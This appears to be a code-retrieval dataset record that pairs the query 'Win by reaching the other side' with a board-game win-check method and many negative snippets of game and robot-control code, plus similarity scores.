self.q_values[self.represent_state(self.prev_state), self.prev_action] += self.alpha * (\n reward - self.prev_q_val)\n self.log(\"the winner is {0}\".format(winner))\n self.prev_state = None\n self.prev_action = None\n self.prev_q_val = 0\n self.winner = VALUES.NOT_FINISHED" ]
[ "0.87138814", "0.78778964", "0.7744418", "0.774094", "0.7740156", "0.7713625", "0.76796615", "0.76591814", "0.7582613", "0.75363356", "0.7433579", "0.74228734", "0.7402117", "0.73863685", "0.7358601", "0.7350067", "0.73360884", "0.7276998", "0.72497123", "0.7248907", "0.71962297", "0.7189612", "0.71824443", "0.7172564", "0.71655774", "0.7124993", "0.7110651", "0.7105993", "0.70961285", "0.7086156", "0.7083036", "0.7079677", "0.7079677", "0.7053935", "0.70495665", "0.70495665", "0.70495665", "0.70495665", "0.7042575", "0.6998348", "0.6998348", "0.69980645", "0.69964635", "0.69849586", "0.6983939", "0.69586205", "0.69375795", "0.6930484", "0.69294095", "0.69066143", "0.6903816", "0.6898266", "0.68923694", "0.6892198", "0.6873615", "0.6869365", "0.6869365", "0.68565226", "0.68565226", "0.68565226", "0.6844696", "0.68311375", "0.68294525", "0.6828143", "0.68050396", "0.68000686", "0.67945796", "0.67909414", "0.67814", "0.67805976", "0.6775497", "0.67670757", "0.6764385", "0.6762848", "0.67626405", "0.67450976", "0.67434806", "0.67252606", "0.67198116", "0.67057", "0.66945755", "0.6694542", "0.6690067", "0.6687592", "0.6685139", "0.6683771", "0.668343", "0.66695684", "0.66668165", "0.6653898", "0.66518617", "0.66510445", "0.66505575", "0.6647054", "0.66400325", "0.6637646", "0.6634894", "0.66346407", "0.66236", "0.66189635" ]
0.69771904
45
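The endGame document above assumes an enclosing game object that has a printable board and a gameOver flag, with the caller expected to stop its loop once the flag is set. A stand-alone sketch of that pattern follows; the Game class and its attributes are assumptions made for illustration, only the endGame body comes from the record.

class Game:
    def __init__(self):
        self.board = "[board placeholder]"  # assumed: anything with a readable __str__
        self.gameOver = False

    def endGame(self, message):
        print(self.board)
        print("Game over! " + message)
        self.gameOver = True

game = Game()
game.endGame("White reached the end. White wins!\n")
assert game.gameOver  # callers are expected to check this flag and stop the loop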
Win by reaching the other side
def checkReachWin(self, color, row):
    if color[0] == 'W' and row == 0:
        self.endGame("White reached the end. White wins!\n")
    elif color[0] == 'B' and row == self.board.size - 1:
        self.endGame("Black reached the end. Black wins!\n")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def does_move_win(self, x, y):\n me = self.board[x][y]\n for (dx, dy) in [(0, +1), (+1, +1), (+1, 0), (+1, -1)]:\n p = 1\n while self.is_on_board(x+p*dx, y+p*dy) and self.board[x+p*dx][y+p*dy] == me:\n p += 1\n n = 1\n while self.is_on_board(x-n*dx, y-n*dy) and self.board[x-n*dx][y-n*dy] == me:\n n += 1\n\n if p + n >= (self.connect + 1): # want (p-1) + (n-1) + 1 >= 4, or more simply p + n >- 5\n return True\n\n return False", "def interaction_door(self) -> None:\n self.grid.win = True", "def win_game(self):\n\n def horizontal_win():\n \"\"\"Return whether there is horizontal win\"\"\"\n\n for i in range(0, board_size):\n if set(self.board[i]) == set([o_symbol]) or set(self.board[i]) == set([x_symbol]):\n print \"horizontal win\"\n return True\n\n def vertical_win():\n \"\"\"Return whether there is vertical win\"\"\"\n\n vert_set = set()\n for i in range(0, board_size):\n for j in range(0, board_size):\n vert_set.add(self.board[j][i])\n if vert_set == set([o_symbol]) or vert_set == set([x_symbol]):\n print \"vertical win\"\n return True \n vert_set = set()\n\n def diagonal_win():\n \"\"\"Return whether there is diagonal win\"\"\"\n\n diagonal_set = set()\n for i in range(0, board_size):\n diagonal_set.add(self.board[i][i]) \n\n if diagonal_set == set([o_symbol]) or diagonal_set == set([x_symbol]):\n print \"diagonal win 1\"\n return True\n \n diagonal_set = set()\n for i in range(0, board_size):\n diagonal_set.add(self.board[i][board_size - 1 - i])\n\n if diagonal_set == set([o_symbol]) or diagonal_set == set([x_symbol]):\n print \"diagonal win 2\"\n return True\n\n if horizontal_win() or vertical_win() or diagonal_win():\n print \"You have won.\"\n return True", "def playerForfeit(self):\n self.handleWin(self.currentplayer*-1)", "def win(self, player):\n if player == 1:\n a = self.player_one.moves\n else:\n a = self.player_two.moves\n winning_moves = []\n for i in range(1, 9, 3):\n winning_moves.append(range(i, i + 3))\n for i in range(1, 4):\n winning_moves.append(range(i, i + 7, 3))\n winning_moves.append([1, 5, 9])\n winning_moves.append([3, 5, 7])\n for move in winning_moves:\n flg = True\n for index in move:\n if index not in a:\n flg = False\n break\n if flg:\n return True, player\n if len(self.player_one.moves) + len(self.player_two.moves) == 9:\n self.print_space()\n self.display_board()\n self.print_space()\n print \" Games is drawn\"\n self.logging.debug(\"Game is draw, nobody won\")\n self.logging.debug(\"Enjoy the game again :)\")\n sys.exit(100)\n return False, player", "def block_to_win():\n position = row_wise_checking(player)\n if position != -1:\n board[position] = computer\n else:\n position = column_wise_checking(player)\n if position != -1:\n board[position] = computer\n else:\n position = diagonal_wise_checking(player)\n if position != -1:\n board[position] = computer\n else:\n return -1", "def checkForWin(self):\n w = self.getWinner()\n if w == PLAYER or w == AI:\n # self.printBoard()\n # print('%d'%w + ' won!')\n return\n if w == Tie:\n # print('Tie')\n return", "def is_win_for(self, checker):\n assert(checker == 'X' or checker == 'O')\n if self.is_vertical_win(checker) or\\\n self.is_down_diagonal_win(checker) or\\\n self.is_up_diagonal_win(checker) or\\\n self.is_horizontal_win(checker):\n return True\n return False", "def check_win_condition(board) -> bool:\n if _check_vertical_win_condition(board) or _check_horizontal_win_condition(board) or _check_diagonal_win_condition(\n board):\n return True\n else:\n board.alternate_current_player()\n return False", "def 
WIN_BONUS() -> int:\n return 2", "def Win(self):\n print ( 10*\"*\")\n print (\"Player \" + self.character + \" says:\")\n print (\"I Won\")\n print ( 10*\"*\")", "def win_for(self, side):\n # Testing rows\n for row in range(self.height):\n for col in range(self.width - 3):\n if ( self.data[row][col] == side\n and self.data[row][col+1] == side\n and self.data[row][col+2] == side\n and self.data[row][col+3] == side):\n return True\n\n # Testing columns\n for col in range(self.width):\n for row in range(self.height - 3):\n if ( self.data[row][col] == side\n and self.data[row+1][col] == side\n and self.data[row+2][col] == side\n and self.data[row+3][col] == side):\n return True\n\n # Testing left diagonal\n for row in range(self.height - 3):\n for col in range(self.width - 3):\n if ( self.data[row][col] == side\n and self.data[row+1][col+1] == side\n and self.data[row+2][col+2] == side\n and self.data[row+3][col+3] == side):\n return True\n\n # Testing right diagonal\n for row in range(self.height - 3):\n for col in range(3, self.width):\n if ( self.data[row][col] == side\n and self.data[row+1][col-1] == side\n and self.data[row+2][col-2] == side\n and self.data[row+3][col-3] == side):\n return True\n\n return False", "def checkWin(self):\n winstates = [(0, 1, 2),\n (3, 4, 5),\n (6, 7, 8),\n (0, 3, 6),\n (1, 4, 7),\n (2, 5, 8),\n (0, 4, 8),\n (2, 4, 6)]\n win = False\n for state in winstates:\n if (self.gameState[state[0]] + self.gameState[state[1]] + self.gameState[state[2]]) == 3:\n self.handleWin(1)\n win = True\n elif (self.gameState[state[0]] + self.gameState[state[1]] + self.gameState[state[2]]) == -3:\n self.handleWin(-1)\n win = True\n\n if len([i for i in range(9) if self.gameState[i] == 0]) == 0 and not win:\n print(\"Draw yo\")\n self.handleDraw()\n return None", "def left_twist(self):\n self.turn_by_deg(-179)\n #time.sleep(.1)\n self.stop()\n self.turn_by_deg(-179)\n #time.sleep(.1)\n self.stop()", "def host_game(self):\n current_side = \"X\"\n while ( (not self.win_for(\"X\"))\n and (not self.win_for(\"O\"))\n and (not self.is_full())):\n print()\n print(self)\n print()\n move = Board.INVALID_MOVE\n while not self.allows_move(move):\n move = int(input(current_side + \"'s move: \"))\n self.add_move(move, current_side)\n if current_side == \"X\":\n current_side = \"O\"\n else:\n current_side = \"X\"\n\n if self.win_for(\"X\"):\n print(\"X wins --- congratulations!\\n\")\n elif self.win_for(\"O\"):\n print(\"O wins --- congratulations!\\n\")\n else:\n print(\"Tied game!\\n\")\n\n print()\n print(self)", "def make_turn(self):\n # if play first, start in the middle\n if np.count_nonzero(self.board) == 0:\n self.place_disc(self.board.shape[1] / 2)\n return 1\n\n\n # win if possible\n for try_column in range(0,self.board.shape[1]):\n if 0 == self.board[0, try_column]:\n new_board = self.simulate_place_disc(self.board, try_column, self.id())\n if dhw.did_he_win(new_board, self.id(), try_column):\n self.place_disc(try_column)\n return 1\n\n # don't loose if in danger\n for try_column in range(0, self.board.shape[1]):\n if 0 == self.board[0,try_column]:\n new_board = self.simulate_place_disc(self.board, try_column, 3 - self.id())\n if dhw.did_he_win(new_board, 3 - self.id(), try_column):\n self.place_disc(try_column)\n return 1\n\n # don't fall in trap!\n forbidden_columns = []\n for try_column in range(0, self.board.shape[1]):\n if 0 == self.board[0,try_column]:\n new_board = self.simulate_place_disc(self.board, try_column, self.id()) # my move\n new_board = 
self.simulate_place_disc(new_board, try_column, 3 - self.id()) # enemy move\n if dhw.did_he_win(new_board, 3 - self.id(), try_column):\n if try_column not in forbidden_columns: forbidden_columns.append(try_column)\n\n # don't ruin my trap\n for try_column in range(0, self.board.shape[1]):\n if 0 == self.board[0,try_column]:\n new_board = self.simulate_place_disc(self.board, try_column, 3 - self.id()) # 'my' move\n new_board = self.simulate_place_disc(new_board, try_column, self.id()) # my move\n if dhw.did_he_win(new_board, self.id(), try_column):\n if try_column not in forbidden_columns: forbidden_columns.append(try_column)\n\n # allow forbidden_columns if no other choice\n if np.count_nonzero(self.board[0, :]) == self.board.shape[1] - len(forbidden_columns):\n forbidden_columns = []\n\n # otherwise, play randomly\n rannum = random.randrange(7)\n while 0 != self.board[0, rannum] or rannum in forbidden_columns:\n rannum = random.randrange(7)\n self.place_disc(rannum)\n return 1", "def __window_forward(self):\n pass", "def CheckWinInDirection(self, pos, direction):\n\n block_owner = self.state[pos]\n\n if block_owner == EMPTY:\n return False\n\n pos_1 = self.ApplyDirection(pos, direction) # Moving To Next Position (1D)\n pos_2 = self.ApplyDirection(pos_1, direction) # Moving To Next Position (1D)\n\n if pos_1 == -1 or pos_2 == -2: # -2 Will Be Max Because You Have To Check With Three Strick-Throughs\n return False\n\n if block_owner == self.state[pos_1] and block_owner == self.state[pos_2]: # Check If There's A StrickThrough\n return True\n\n return False", "def win(self):\n self.die()", "def game_win(self):\n self.win = True\n self.msg.set_text(u'YOU WIN <Press Space>')\n self.msg.show(True)", "def check_win(self):\r\n wins = [self.check_rows(), self.check_cols(), self.check_diag()]\r\n for case, pos in wins:\r\n if case != -1:\r\n print('Game over!')\r\n if self.grid[case][-1] == self.computer:\r\n print('The computer won!')\r\n return (True, pos)\r\n print('The player won!')\r\n return (True, pos)\r\n\r\n return (self.check_draw(), None)", "def check_for_win_lose(b):\r\n win_move = None\r\n block_win = None\r\n # check for wins based on row\r\n for ri in range(3):\r\n row = b[ri]\r\n if single_move(row):\r\n if row==[1,1,0]:\r\n win_move = (ri+1,3)\r\n elif row==[2,2,0]:\r\n block_win = (ri+1,3)\r\n elif row==[1,0,1]:\r\n win_move = (ri+1,2)\r\n elif row==[2,0,2]:\r\n block_win = (ri+1,2)\r\n elif row==[0,1,1]:\r\n win_move = (ri+1,1)\r\n elif row==[0,2,2]:\r\n block_win = (ri+1,1)\r\n else:\r\n print '144 ERROR!'\r\n print single_move(row)\r\n print row\r\n print ' '\r\n\r\n # check for win based on column\r\n for ci in range(3):\r\n col = get_col(b,ci)\r\n if single_move(col):\r\n if col==[1,1,0]:\r\n win_move = (3,ci+1)\r\n elif col==[2,2,0]:\r\n block_win = (3,ci+1)\r\n elif col==[1,0,1]:\r\n win_move = (2,ci+1)\r\n elif col==[2,0,2]:\r\n block_win = (2,ci+1)\r\n elif col==[0,1,1]:\r\n win_move = (1,ci+1)\r\n elif col==[0,2,2]:\r\n block_win = (1,ci+1)\r\n else:\r\n print '166 ERROR!'\r\n print single_move(col)\r\n print col\r\n print ' '\r\n\r\n # check for win on backward diagonal\r\n diag = get_bw_diag(b)\r\n if single_move(diag):\r\n if diag==[1,1,0]:\r\n win_move = (3,3)\r\n elif diag==[2,2,0]:\r\n block_win (3,3)\r\n elif diag == [1,0,1]:\r\n win_move = (2,2)\r\n elif diag==[2,0,2]:\r\n block_win = (2,2)\r\n elif diag == [0,1,1]:\r\n win_move = (1,1)\r\n elif diag==[0,2,2]:\r\n block_win = (1,1)\r\n \r\n # check for win on forward diagonal\r\n diag = get_fwd_diag(b)\r\n if 
single_move(diag):\r\n if diag == [1,1,0]:\r\n win_move = (3,1)\r\n elif diag==[2,2,0]:\r\n block_win = (3,1)\r\n elif diag == [1,0,1]:\r\n win_move = (2,2)\r\n elif diag==[2,0,2]:\r\n block_win = (2,2)\r\n elif diag == [0,1,1]:\r\n win_move = (1,3)\r\n elif diag==[0,2,2]:\r\n block_win = (1,3)\r\n\r\n if win_move is not None:\r\n return (win_move, True)\r\n elif block_win is not None:\r\n return (block_win, False)\r\n else:\r\n return (None, False)", "def _play(self, func):\n\n func()\n print('\\nhuman movement:\\n')\n print(self._board)\n\n while self._board.possible() != []:\n self._board.move_computer()\n print('\\ncomputer movement:\\n')\n print(self._board)\n if self._board.check_win():\n print('\\nwinner is computer')\n return\n\n func()\n print('\\nhuman movement:\\n')\n print(self._board)\n if self._board.check_win():\n print('\\nwinner is human')\n return\n print('\\nwinner is friendship :)')", "def play_game(self):\n while self.over is False:\n self.board.print_board()\n winner = self.check_over()\n if winner != -1:\n return winner\n self.p1.get_move(self.board)\n self.board.print_board()\n winner = self.check_over()\n if winner != -1:\n return winner\n self.p2.get_move(self.board)", "def __check_win_condition(self,token,coordinate):\n # Check if it's even possible to win yet\n if self._turn_counter >= 8 and self._turn_counter+1 < self._board_size**2:\n # Disable win\n # return False\n\n # Up and up right vectors\n vec1=(1,0)\n vec2=(1,1)\n\n # Loop both directions of vector\n for _ in range(2):\n if self.__check_direction(vec1,coordinate):\n self.__declare_winner()\n return True\n if self.__check_direction(vec2,coordinate):\n self.__declare_winner()\n return True\n\n # Turn vector directions\n vec1 = -vec1[1], vec1[0]\n vec2 = -vec2[1], vec2[0]\n\n # Check for draw\n elif self._turn_counter+1 >= self._board_size**2:\n if (self._gui):\n self.__turn_counter_label[\"text\"] = \"Draw!\"\n self.__status[\"text\"] = \"\"\n self.__status.update()\n self.__turn_counter_label.update()\n self._winner = 3\n if (self._state == PLAY): showerror(\"Draw\",\"Draw!\")\n return True", "def test_win(self):\n game = self.ending(['bw.wwwww'], 8, 1)\n game.man_move(0, 2)\n self.assertEqual(game.finish_state, (250, game.first_player, 'Win'))", "def determine_win(self):\n if self.match.radiant_win is True and self.player_slot < 5:\n return True\n if self.match.radiant_win is False and self.player_slot > 5:\n return True\n return False", "def nail_in(self):\n if not self.in_wall:\n self.in_wall = True", "def __win(self, a):\n for i in range(len(a)-self.k+1):\n flag = True\n for j in range(self.k):\n if not a[i+j]:\n flag = False\n break\n if flag: return True", "def combinedcontrol(self):\n print('conbinedcontrol\\r')\n persondistance = math.sqrt((self.currentx-self.personx)**2 + (self.currenty-self.persony)**2)\n if persondistance <= .5:\n self.goto_point(self.clearx,self.cleary)\n print 'avoiding\\r'\n else:\n self.goto_point(self.personx,self.persony)\n print 'following\\r'\n self.sendMessage()", "def main():\r\n lp = launchpad_py.Launchpad() \r\n lp.Open()\r\n lp.LedAllOn(0)\r\n displayField(lp)\r\n player = 1\r\n while True:\r\n time.sleep(0.01)\r\n if player == 1:\r\n letter = \" X \"\r\n if player == 2:\r\n letter = \" O \"\r\n if setCross(lp, player, field, letter):\r\n if player == 1:\r\n player = 2\r\n else:\r\n player = 1\r\n if theWinnerIs(field, letter):\r\n if letter == \" X \":\r\n allOnForWinner(field,letter,lp)\r\n if letter == \" O \":\r\n allOnForWinner(field,player,lp)\r\n break\r\n 
if equal(field):\r\n lp.LedAllOn(lp.LedGetColor(3, 3))\r\n break", "def check_win(self):\n win = None\n for pos in self.winning_pos:\n win = self.is_match(set(self.get_cells(pos)))\n if win:\n return win\n if not self.open_tiles():\n return \"Draw\"\n return win", "def checkForWin (self):\r\n\t\tw = self.getWinner()\r\n\t\tif w:\r\n\t\t\tself.printBoard()\r\n\t\t\traise Exception(w + ' won!')", "def right(self):\n win = self.clients.current_client\n x, y = win.x, win.y\n candidates = [c for c in self.clients if c.info()[\"x\"] > x]\n self.clients.current_client = self._get_closest(x, y, candidates)\n self.group.focus(self.clients.current_client)", "def vertical_win():\n\n vert_set = set()\n for i in range(0, board_size):\n for j in range(0, board_size):\n vert_set.add(self.board[j][i])\n if vert_set == set([o_symbol]) or vert_set == set([x_symbol]):\n print \"vertical win\"\n return True \n vert_set = set()", "def win(self):\n print \"\\n{0} has escaped the dungeon, as few before have. {0} survived {1} rooms.\\n\".format(self.name, self.roomCt)\n exit()", "def is_win_for(self, checker):\r\n assert(checker == 'X' or checker == 'O')\r\n\r\n return self.is_horizontal_win(checker) or \\\r\n self.is_vertical_win(checker) or \\\r\n self.is_down_diagonal_win(checker) or \\\r\n self.is_up_diagonal_win(checker)", "def foward_shimmey(self):\n for x in range(6):\n self.right(primary=60, counter=30)\n time.sleep(.5)\n self.left(primary=70, counter=30)\n time.sleep(.5)\n self.back()\n time.sleep(2) \n self.stop()", "def __handle_view_win_condition(self, gamestate_component):", "def winFor(self,player):\n if(self.cachedWin == False):\n won = False;\n if(player==WHITE):\n for x in range(0,WIDTH):\n if(self.gameState[x,0]==WHITE):\n won = True\n \n elif(player==BLACK):\n for x in range(0,WIDTH):\n if(self.gameState[x,HEIGHT-1]==BLACK):\n won = True\n \n if(len(self.successors()) == 0):#IF there are no available moves for both players\n bCount = self.count(BLACK) #check who has the most pawns\n wCount = self.count(BLACK)\n if(bCount>wCount):\n self.cachedWin = True\n self.cachedWinner = player\n return True\n if(wCount>bCount):\n self.cachedWin = True\n self.cachedWinner = player\n return True\n \n if(won):\n self.cachedWin = True\n self.cachedWinner = player\n return True\n else:\n return False\n else:\n return player == self.cachedWinner", "def win_game(self):\r\n self.board.clear_hovered_tiles_list()\r\n self.is_game_over = True\r\n self.reset_button.won_game()\r\n self.high_score.update(self.timer.seconds)", "def won(self):\n self.Display.blit(self.Won,[205-self.Won.get_width()//2,150-self.Won.get_height()//2])\n pygame.draw.rect(self.Display,[200,97,48],(60,230,290,70))\n pygame.draw.rect(self.Display,[200,97,48],(60,320,290,70))\n pygame.draw.rect(self.Display,[106,106,150],(65,235,280,60))\n pygame.draw.rect(self.Display,[106,106,150],(65,325,280,60))\n pygame.display.update()\n self.Display.blit(self.Newgame,[205-self.Newgame.get_width()//2,265-self.Newgame.get_height()//2])\n self.Display.blit(self.Continue,[205-self.Continue.get_width()//2,355-self.Continue.get_height()//2])\n pygame.display.update()\n while True:\n x,y=pygame.mouse.get_pos()\n if x>64 and y<345:\n if y>234 and y<295:\n pygame.draw.rect(self.Display,[200,97,48],(65,235,280,60))\n self.Display.blit(self.Newgame,[205-self.Newgame.get_width()//2,265-self.Newgame.get_height()//2])\n else:\n pygame.draw.rect(self.Display,[106,106,150],(65,235,280,60))\n 
self.Display.blit(self.Newgame,[205-self.Newgame.get_width()//2,265-self.Newgame.get_height()//2])\n if y>324 and y<386:\n pygame.draw.rect(self.Display,[200,97,48],(65,325,280,60))\n self.Display.blit(self.Continue,[205-self.Continue.get_width()//2,355-self.Continue.get_height()//2])\n else:\n pygame.draw.rect(self.Display,[106,106,150],(65,325,280,60))\n self.Display.blit(self.Continue,[205-self.Continue.get_width()//2,355-self.Continue.get_height()//2])\n pygame.display.update()\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n self.Game.GameBoard.display()\n return \"Exit\"\n elif event.type==pygame.MOUSEBUTTONDOWN:\n x,y=pygame.mouse.get_pos()\n if x>64 and x<345:\n if y>234 and y<296:\n return 'newgame'\n elif y>324 and y<386:\n return", "def notify_winner(self):\n self.is_winner = True", "def win_condition(self):\n return self.wave == 8", "def switchTurn(self):\n\n # Widget for player 1\n if self.frame1.state() == 'normal':\n self.frame2.deiconify()\n self.frame1.withdraw()\n self.frame1.update()\n self.frame2.update()\n if self.message[0]:\n showDialogBox(self.message[0]) # announce\n self.message[0] = None\n game2.canvas.tag_bind('square', '<Button-1>', game2.fire)\n\n # Widget for player 2\n else:\n self.frame1.deiconify()\n self.frame2.withdraw()\n self.frame1.update()\n self.frame2.update()\n if game2.isComputer == 1:\n self.frame1.after(500)\n game1.computer_fire()\n else:\n if self.message[1]:\n showDialogBox(self.message[1]) # announce\n self.message[1] = None\n game1.canvas.tag_bind('square', '<Button-1>', game1.fire)", "def check_winner(self):\n pass", "def TransferToWindow(self):\n return True", "def check_win(self):\n for pos in self.win_set:\n s = set([self.grid[p] for p in pos])\n if len(s) == 1 and (0 not in s):\n return True\n return False", "def launchGame(): \n # On rejoint la partie\n game.join()\n\n #On affecte le nom\n game.player.setName(options.name)\n\n #On créer une nouvelle fenetre\n win = createNewWin(curses)\n\n #On creer notre premiere pomme...\n win.addch(game.apple.coordx, game.apple.coordy, 'O', curses.color_pair(3))\n\n #On indique la direction par defaut du serpent, il ira par defaut a droite\n key = curses.KEY_RIGHT\n\n #On effectue une boucle infinie tant que la touche Echap (27) n'est pas\n #pressée.\n while key != 27:\n #On ajoute le score a la ligne 0, colonne 2\n #Le score est calcule en recuperant la longueur du serpent actuel\n #et en retirant 2 (sa valeur initiale)\t\n win.addstr(0,2,' Joueur : %s Score : %s ' %(game.player.name, str(game.player.score)), curses.color_pair(1))\n\n #On calcul un mouvement de ralentissement dependant de la longueur du\n #serpent\n win.timeout(180+ ( (len(game.snake.oSnake)-2) % 10- (len(game.snake.oSnake)-2) ) * 3 )\n\n #On 'hook' les touches\n getkey = win.getch()\n\n #On recupere la valeur de la touche par defaut\n key = key if getkey==-1 else getkey\n\n #Suivant la touche pressée, on modifie les positions de notre serpent\n game.snake.move(key)\n\n #On supprime les derniers elements sur lequel le Snake passe\n win.addch(game.snake.oSnake[len(game.snake.oSnake)-1][1],\n game.snake.oSnake[len(game.snake.oSnake)-1][0],' ')\n\n #On supprime un element du snake pour eviter la collision\n if win.inch(game.snake.oSnake[0][1], game.snake.oSnake[0][0]) & 255 == 32:\n game.snake.oSnake.pop()\n\n #Si on passe sur un element O\t\n elif win.inch(game.snake.oSnake[0][1],game.snake.oSnake[0][0]) & 255 == ord('O'):\n #On ajoute 1 point a notre Joueur\n game.player.addPoint()\n\n #On recalcule des nouvelles 
coordonnees pour la pomme\n game.apple.newApple()\n #On verifie les nouvelles coordonnees\n while game.apple.checkApple(game.snake.oSnake) != True:\n game.apple.newApple()\n\n #On l'affiche a l'ecran\n win.addch(game.apple.coordx, game.apple.coordy, 'O', curses.color_pair(3))\n\t\t\n else:\n break\n\n #On affiche une partie de notre Snake\n win.addch(game.snake.oSnake[0][1],game.snake.oSnake[0][0],'X', curses.color_pair(2))\n\n\n #Si on sort de la boucle (GameOver), alors on\n #détruit les fenetres\n destroyWin()\n\n #A la fin de la partie (game over), on affiche l'écran \n showGameOver()", "def move_window():\n\tif SLIDING_WINDOW:\n\t\t# get the chosen predicates\n\t\tpred = Predicate.objects.filter(pk__in=[p+1 for p in toggles.CHOSEN_PREDS])\n\n\t\t# handle window properties\n\t\tfor p in pred:\n\t\t\tp.move_window()", "def play(self):\n\n while self.board.board[self.board.target_location()[0]]\\\n [self.board.target_location()[1]] == \"E\": # the car didn't\n # arrive the exit\n self.__single_turn()\n print(\"you won!\")", "def determine_winner(self):\r\n for i in range(2):\r\n # Way of the Stone (capture opponent master)\r\n if not self.bitboard_king[i]:\r\n return 1 - i * 2\r\n # Way of the Stream (move master to opposite square)\r\n if self.bitboard_king[i] == self.WIN_BITMASK[i]:\r\n return i * 2 - 1\r\n return 0", "def run(self):\n while not self.turn_over:\n self.go()", "def win(self):\n return \"Win\"", "def check_win(self, board, move):\n for i, j, k in self.winning_cases:\n if board[i] == move and board[j] == move and board[k] == move:\n return True\n return False", "def horizontal_win():\n\n for i in range(0, board_size):\n if set(self.board[i]) == set([o_symbol]) or set(self.board[i]) == set([x_symbol]):\n print \"horizontal win\"\n return True", "def determine_round_winner(self):\n\n if self.getX() + self.SIZE[0] < 0:\n # point for player two\n return 2\n elif self.getX() > Configuration.windowWidth:\n # point for player one\n return 1", "def TransferFromWindow(self):\n return True", "def at_wall(self):\n\n wall_close = self.is_at_wall()\n \n # Decide which direction to go\n if wall_close:\n \n # Find the closest detected point\n dmin = self.distmax\n tmin = 0\n for i, d in enumerate(self.parameters.sensor_distances):\n if d < dmin:\n dmin = d\n tmin = self.parameters.sensor_poses[i].theta\n \n # Go that way\n if tmin > 0:\n self.parameters.direction = 'left'\n else:\n self.parameters.direction = 'right'\n \n # Notify the controller\n self.wall.set_parameters(self.parameters)\n \n # Save the closest we've been to the goal\n self.best_distance = self.distance_from_goal\n \n return wall_close", "def player_stage(niv): \n playing = True\n a = niv[0][0] \n b = niv[0][1] \n (x, y) = (a, b) \n state = [[a, b]] #Create a list with the starting point of the selected level patern.\n sense.stick.get_events()\n while playing:\n for event in sense.stick.get_events(): #It moves the pixel with the player moves and add the point passed by the player in the state[].\n if event.action == 'pressed':\n if event.direction == 'left':\n if x > 0:\n x = min(x-1, 7)\n state.append([x, y])\n elif event.direction == 'right':\n if x < 7:\n x = max(x+1, 0)\n state.append([x, y])\n if event.direction == 'down':\n if y < 7:\n y = min(y+1, 7)\n state.append([x, y])\n elif event.direction == 'up':\n if y > 0:\n y = max(y-1, 0)\n state.append([x, y])\n elif event.direction == 'middle':\n playing = False\n sense.set_pixel(x, y, RED)\n if state[:] == niv[:]: #Compare the way choosen by the player with the 
selected level patern. Results of the try.\n sense.show_message(\"WINNER !\",\n text_colour=LEMON, scroll_speed=0.05)\n sleep(2)\n main() #brings back to the level selection.\n else:\n sense.show_message(\"LOSER !\",\n text_colour=BLUE, scroll_speed=0.05)\n sleep(2)\n try_again(niv) #cf. try_again() function", "def backToMiddlePos():\n\tprogMode(True) # Active le couple de servos\n\taxDriver.goToPosition(axDriver.BROADCASTID, 0x1FF) # Renvoie a la position 0x1FF", "def won(self):\n for y in range(self.size):\n winning = []\n for x in range(self.size):\n if self.fields[x, y] == self.opponent:\n winning.append((x, y))\n if len(winning) == self.size:\n return winning\n for x in range(self.size):\n winning = []\n for y in range(self.size):\n if self.fields[x, y] == self.opponent:\n winning.append((x, y))\n if len(winning) == self.size:\n return winning\n winning = []\n for y in range(self.size):\n x = y\n if self.fields[x, y] == self.opponent:\n winning.append((x, y))\n if len(winning) == self.size:\n return winning\n winning = []\n for y in range(self.size):\n x = self.size-1-y\n if self.fields[x, y] == self.opponent:\n winning.append((x, y))\n if len(winning) == self.size:\n return winning\n return None", "def nav(self):\n print(\"-----------! NAVIGATION ACTIVATED !------------\\n\")\n print(\"-------- [ Press CTRL + C to stop me ] --------\\n\")\n print(\"-----------! NAVIGATION ACTIVATED !------------\\n\")\n #print(\"Wait a second. \\nI can't navigate the maze at all. Please give my programmer a zero.\")\n \n \n self.starting_postion = self.get_heading()\n while True:\n while self.quick_check():\n self.fwd()\n time.sleep(0.01)\n self.corner_count = 0 #counts the corners so you can use it later to get out of them\n self.stop()\n self.corner_work()\n self.left_or_right()\n # how would you make it turn when it is going the wrong direction", "def right_twist(self):\n self.turn_by_deg(180)\n #time.sleep(.1)\n self.stop()\n self.turn_by_deg(180)\n #time.sleep(.1)\n self.stop()", "def turn():\r\n global turn_no\r\n turn_no += 1\r\n dlog('Starting Turn!')\r\n board_size = get_board_size()\r\n\r\n team = get_team()\r\n opp_team = Team.WHITE if team == Team.BLACK else team.BLACK\r\n dlog('Team: ' + str(team))\r\n\r\n robottype = get_type()\r\n dlog('Type: ' + str(robottype))\r\n\r\n if robottype == RobotType.PAWN:\r\n dlog('Human')\r\n\r\n r, c = get_location()\r\n dlog('My location is: ' + str(r) + ' ' + str(c))\r\n\r\n if team == Team.WHITE:\r\n forward = 1\r\n scan = 2\r\n else:\r\n forward = -1\r\n scan = -2\r\n \r\n # try capturing pieces\r\n if check_space_wrapper(r + forward, c + 1, board_size) == opp_team: # up and right\r\n capture(r + forward, c + 1)\r\n dlog('Captured at: (' + str(r + forward) + ', ' + str(c + 1) + ')') \r\n\r\n elif check_space_wrapper(r + forward, c - 1, board_size) == opp_team: # up and left\r\n capture(r + forward, c - 1)\r\n dlog('Captured at: (' + str(r + forward) + ', ' + str(c - 1) + ')')\r\n \r\n elif r + forward != -1 and r + forward != board_size and not check_space_wrapper(r + forward, c, board_size):\r\n try:\r\n if check_space(r, c-1) == get_team() or check_space(r-1, c-1) == get_team() or check_space(r, c+1) == get_team() or check_space(r-1, c+1) == get_team():\r\n move_forward()\r\n dlog('Moved forward!')\r\n except:\r\n pass\r\n\r\n \r\n else:\r\n board = get_board()\r\n dlog(str(board))\r\n if team == Team.WHITE:\r\n forward = 1\r\n index = 0\r\n\r\n else:\r\n forward = -1\r\n index = board_size - 1\r\n \r\n deep_accum = []\r\n c_indexes = []\r\n 
